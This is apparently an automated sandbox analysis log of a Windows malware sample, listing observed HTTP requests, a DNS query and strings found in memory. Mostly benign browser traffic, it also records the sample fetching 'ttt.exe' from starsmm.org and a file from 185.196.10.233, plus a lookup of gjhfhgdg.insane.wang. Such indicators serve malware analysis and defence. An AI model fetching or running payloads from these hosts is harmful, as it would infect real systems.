Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SignInData.70016e6eaece05b76578.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sticky-peek.8a52a328061c5a4af40c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waterfall-view-feed.da1860afbfeb79eba90c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-wc.6e8a0415b27366196d3f.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cEE23?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Excel_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/OneNote_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Outlook_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerAutomate_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerPoint_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/SharePoint_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Skype_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Sway_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Teams_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Visio_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Word_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Engage_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Yammer_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Calendar_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/ToDo_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Viva_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nkGyhUBOnovzuz5&MD=oygleuew HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=AddressBar HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: AddressBarSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /ttt.exe HTTP/1.1Host: starsmm.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr

String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: gjhfhgdg.insane.wang

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-ActivityId: 662821dd-7e47-4936-932f-4df8712adf71DDD-StrategyExecutionLatency: 00:00:00.0012995,00:00:00.0014526DDD-DebugId: 662821dd-7e47-4936-932f-4df8712adf71\|2024-04-23T21:02:21.4860540Z\|fabric_msn\|ESU\|News_595DDD-Auth-Features: MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 2X-MSEdge-ResponseInfo: 2Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 662821dd7e474936932f4df8712adf71\|AFD:662821dd7e474936932f4df8712adf71\|2024-04-23T21:02:21.479ZX-MSEdge-Ref: Ref A: A8C57D43280F4A7F8E642476C0747D98 Ref B: ASHEDGE1415 Ref C: 2024-04-23T21:02:21ZExpires: Tue, 23 Apr 2024 21:02:21 GMTDate: Tue, 23 Apr 2024 21:02:21 GMTContent-Length: 74Connection: closeSet-Cookie: _C_ETH=1; expires=Mon, 22 Apr 2024 21:02:21 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; expires=Sun, 18 May 2025 21:02:21 GMT; path=/; httponlySet-Cookie: _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; domain=.msn.com; path=/; httponlyAkamai-Request-BC: [a=23.11.231.159,b=402745566,c=g,n=US_GA_ATLANTA,o=20940],[a=204.79.197.203,c=o]Server-Timing: clientrtt; dur=105, clienttt; dur=36, origin; dur=31 , cdntime; dur=5Akamai-Cache-Status: NotCacheable from childAkamai-Server-IP: 23.11.231.159Akamai-Request-ID: 180168deAccess-Control-Allow-Methods: PUT,PATCH,POST,GET,OPT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Access-Control-Allow-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedAccess-Control-Expose-Headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,OneSvc-Uni-Feat-Tun,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent,Widgets,Muted,Velocity,DDD-Auth-Features,SoftLanding,PrefMigratedDDD-AuthenticatedWithJwtFlow: FalseDDD-UserType: AnonymousMuidDDD-ActivityId: 662821e3-7c77-4618-afd4-d047e32a6ccbDDD-StrategyExecutionLatency: 00:00:00.0011697,00:00:00.0013259DDD-DebugId: 662821e3-7c77-4618-afd4-d047e32a6ccb\|2024-04-23T21:02:27.8856281Z\|fabric_msn\|ESU\|News_645DDD-Auth-Features: MuidStateOrigin:MuidFromCookieOneWebServiceLatency: 2X-MSEdge-ResponseInfo: 2Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAX-Ceto-ref: 662821e37c774618afd4d047e32a6ccb\|AFD:662821e37c774618afd4d047e32a6ccb\|2024-04-23T21:02:27.880ZX-MSEdge-Ref: Ref A: 2FE1575012CC48F381EA25BFB9807BBB Ref B: BL2EDGE2411 Ref C: 2024-04-23T21:02:27ZExpires: Tue, 23 Apr 2024 21:02:27 GMTDate: Tue, 23 Apr 2024 21:02:27 GMTContent-Length: 74Connection: closeSet-Cookie: _C_ETH=1; expires=Mon, 22 Apr 2024 21:02:27 GMT; domain=.msn.com; path=/; secure; httponlySet-Cookie: _C_Auth=Set-Cookie: _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; domain=.msn.com; path=/; httponlyAkamai-Request-BC: [a=23.11.231.159,b=402749418,c=g,n=US_GA_ATLANTA,o=20940],[a=204.79.197.203,c=o]Server-Timing: clientrtt; dur=105, clienttt; dur=39, origin; dur=37 , cdntime; dur=2Akamai-Cache-Status: NotCacheable from childAkamai-Server-IP: 23.11.231.159Akamai-Request-ID: 180177eaAccess-Control-Allow-Methods: PUT,PATCH,POST,GET,OPTIONS,DELETEAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: https://ntp.msn.comX-AS-S

Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.196.10.233/dll/ghghghgfg.xml
Source: svchost.exe, 00000007.00000002.4113686005.000001CC77400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/
Source: svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/250
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000002.4112917363.000001CC72702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2391574900.000001CC773E2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0/go
Source: svchost.exe, 00000007.00000003.1738844921.000001CC7764D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000007.00000002.4113907895.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3433799346.000001CC7748E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: qmgr.db.7.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: zlONcFaXkc.exe, 00000000.00000002.1681293502.000001DFC2096000.00000004.00000020.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4273287178.000001D0B4314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.m
Source: Target.exe, 00000001.00000002.4268426290.000001D0B4081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsof.com
Source: zlONcFaXkc.exe, 00000000.00000002.1682381223.000001DFC22F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft
Source: zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9865000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB58B000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: chromecache_514.13.dr	String found in binary or memory: http://www.broofa.com
